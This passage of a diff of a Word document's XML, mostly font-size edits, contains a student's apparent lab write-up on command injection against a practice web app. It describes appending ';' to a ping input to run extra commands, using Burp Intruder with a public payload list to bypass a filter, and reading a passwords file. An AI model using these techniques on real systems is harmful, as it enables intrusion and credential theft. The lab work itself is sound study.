-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
         </w:rPr>
         <w:t xml:space="preserve">It should be too easy to tell the input to do more commands. For example, we can enter any </w:t>
       </w:r>
@@ -3275,6 +5837,8 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
         </w:rPr>
         <w:t>ip</w:t>
       </w:r>
@@ -3282,6 +5846,8 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
         </w:rPr>
         <w:t xml:space="preserve"> normally then we can finish the command by </w:t>
       </w:r>
@@ -3289,6 +5855,8 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
         </w:rPr>
         <w:t>putting ;</w:t>
       </w:r>
@@ -3296,6 +5864,8 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
         </w:rPr>
         <w:t xml:space="preserve"> in the end. After that, we can enter more commands to get more details like (ls, pwd, etc).</w:t>
       </w:r>
@@ -3304,19 +5874,25 @@
       <w:pPr>
         <w:rPr>
           <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
         </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
           <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
           <w:noProof/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
         </w:rPr>
         <w:drawing>
           <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="63E3A603" wp14:editId="77FE8FF5">
@@ -3372,11 +5948,15 @@
       <w:pPr>
         <w:rPr>
           <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
         </w:rPr>
         <w:t xml:space="preserve">As we ping the </w:t>
       </w:r>
@@ -3384,6 +5964,8 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
         </w:rPr>
         <w:t>ip</w:t>
       </w:r>
@@ -3391,6 +5973,8 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
         </w:rPr>
         <w:t xml:space="preserve">, we also managed to execute ls command which outputs files and folders in the system (help, </w:t>
       </w:r>
@@ -3398,6 +5982,8 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
         </w:rPr>
         <w:t>index.php</w:t>
       </w:r>
@@ -3405,6 +5991,8 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
         </w:rPr>
         <w:t>, source)</w:t>
       </w:r>
@@ -3413,47 +6001,60 @@
       <w:pPr>
         <w:rPr>
           <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
-        </w:rPr>
-        <w:lastRenderedPageBreak/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
         <w:t xml:space="preserve">Let us see the content of </w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
         </w:rPr>
         <w:t>index.php</w:t>
       </w:r>
@@ -3461,6 +6062,8 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
         </w:rPr>
         <w:t xml:space="preserve"> for example: </w:t>
       </w:r>
@@ -3469,19 +6072,25 @@
       <w:pPr>
         <w:rPr>
           <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
         </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
           <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
           <w:noProof/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
         </w:rPr>
         <w:drawing>
           <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="09CE2909" wp14:editId="3278D0BE">
@@ -3537,88 +6146,113 @@
       <w:pPr>
         <w:rPr>
           <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Heading3"/>
-      </w:pPr>
-      <w:r>
-        <w:lastRenderedPageBreak/>
-        <w:t xml:space="preserve">Command Injection – </w:t>
-      </w:r>
-      <w:r>
-        <w:t>Medium</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> level</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading4"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>Command Injection – Medium level</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
         </w:rPr>
         <w:t>When trying to do the previous method here you would not get any response</w:t>
       </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
         </w:rPr>
         <w:t>.</w:t>
       </w:r>
@@ -3627,11 +6261,15 @@
       <w:pPr>
         <w:rPr>
           <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
         </w:rPr>
         <w:t xml:space="preserve">Why? Looking at the code: </w:t>
       </w:r>
@@ -3640,12 +6278,16 @@
       <w:pPr>
         <w:rPr>
           <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
         </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
           <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
           <w:noProof/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
         </w:rPr>
         <w:drawing>
           <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7AC4D457" wp14:editId="0B8510BE">
@@ -3701,18 +6343,24 @@
       <w:pPr>
         <w:rPr>
           <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
         </w:rPr>
         <w:t>We see that some symbols are not allowed anymore. Good but not good enough as the attacker can easily to adjust the POST request in Burp Suite to look for the allowed symbols.</w:t>
       </w:r>
@@ -3721,19 +6369,25 @@
       <w:pPr>
         <w:rPr>
           <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
         </w:rPr>
       </w:pPr>
       <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
         </w:rPr>
         <w:t>First</w:t>
       </w:r>
@@ -3741,6 +6395,8 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
         </w:rPr>
         <w:t xml:space="preserve"> I went to google.com and looked up:</w:t>
       </w:r>
@@ -3749,12 +6405,16 @@
       <w:pPr>
         <w:rPr>
           <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
         </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
           <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
           <w:noProof/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
         </w:rPr>
         <w:drawing>
           <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="62635292" wp14:editId="51DB1493">
@@ -3810,11 +6470,15 @@
       <w:pPr>
         <w:rPr>
           <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
         </w:rPr>
         <w:t>I found this page</w:t>
       </w:r>
@@ -3823,6 +6487,8 @@
       <w:pPr>
         <w:rPr>
           <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
         </w:rPr>
       </w:pPr>
       <w:hyperlink r:id="rId31" w:history="1">
@@ -3830,6 +6496,8 @@
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
             <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+            <w:sz w:val="24"/>
+            <w:szCs w:val="24"/>
           </w:rPr>
           <w:t>https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Command%20Injection/Intruder/command_exec.txt</w:t>
         </w:r>
@@ -3839,11 +6507,15 @@
       <w:pPr>
         <w:rPr>
           <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
         </w:rPr>
         <w:t xml:space="preserve">This </w:t>
       </w:r>
@@ -3851,6 +6523,8 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
         </w:rPr>
         <w:t>github</w:t>
       </w:r>
@@ -3858,6 +6532,8 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
         </w:rPr>
         <w:t xml:space="preserve"> page has so many command injection payloads that I can try for the exercise.</w:t>
       </w:r>
@@ -3866,11 +6542,15 @@
       <w:pPr>
         <w:rPr>
           <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
         </w:rPr>
         <w:t xml:space="preserve">I sent the request to Intruder. Sniper method helped me to load the words list and I filtered the output to packet loss as I would know the right answer If the packet loss check box was checked. </w:t>
       </w:r>
@@ -3879,12 +6559,16 @@
       <w:pPr>
         <w:rPr>
           <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
         </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
           <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
           <w:noProof/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
         </w:rPr>
         <w:lastRenderedPageBreak/>
         <w:drawing>
@@ -3941,25 +6625,33 @@
       <w:pPr>
         <w:rPr>
           <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
         </w:rPr>
         <w:t>Eventually, I got to output the passwords file.</w:t>
       </w:r>
@@ -3968,20 +6660,26 @@
       <w:pPr>
         <w:rPr>
           <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
         </w:rPr>
       </w:pPr>
     </w:p>
@@ -3990,49 +6688,414 @@
         <w:pStyle w:val="Heading1"/>
         <w:rPr>
           <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
-        </w:rPr>
-      </w:pPr>
-      <w:bookmarkStart w:id="5" w:name="_Toc113407015"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:bookmarkStart w:id="12" w:name="_Toc113747833"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
         </w:rPr>
         <w:t>(BOK) Network Security (week 5-8)</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="5"/>
+      <w:bookmarkEnd w:id="12"/>
     </w:p>
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Heading1"/>
         <w:rPr>
           <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
-        </w:rPr>
-      </w:pPr>
-      <w:bookmarkStart w:id="6" w:name="_Toc113407016"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:bookmarkStart w:id="13" w:name="_Toc113747834"/>
       <w:r>
         <w:rPr>
